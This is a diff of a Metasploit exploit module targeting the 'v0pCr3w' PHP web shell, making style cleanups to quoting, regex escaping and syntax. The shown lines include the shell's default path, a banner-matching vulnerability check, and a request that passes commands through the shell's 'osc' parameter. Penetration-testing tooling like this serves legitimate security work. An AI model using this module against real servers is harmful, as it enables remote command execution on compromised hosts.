@@ -37,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
                           'PayloadType' => 'cmd'
                         }
         },
-        'Platform' => %w{unix win},
         'Arch' => ARCH_CMD,
         'Targets' => [
           ['v0pCr3w / Unix', { 'Platform' => 'unix' } ],
@@ -55,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, "The path to the v0pCr3w shell", "/jos.php"]),
+        OptString.new('TARGETURI', [true, 'The path to the v0pCr3w shell', '/jos.php']),
       ]
     )
   end
@@ -68,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'lol' => '1'
       }
     })
-    if (shell and shell.body =~ /v0pCr3w\<br\>/ and shell.body =~ /\<br\>nob0dyCr3w/)
+    if (shell and shell.body =~ /v0pCr3w<br>/ and shell.body =~ /<br>nob0dyCr3w/)
       return Exploit::CheckCode::Vulnerable
     end
 
@@ -84,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'osc' => p
       }
     })
-    if not (res and res.code == 200)
+    if !(res and res.code == 200)
       fail_with(Failure::Unknown, 'Failed to execute the command.')
     end
   end
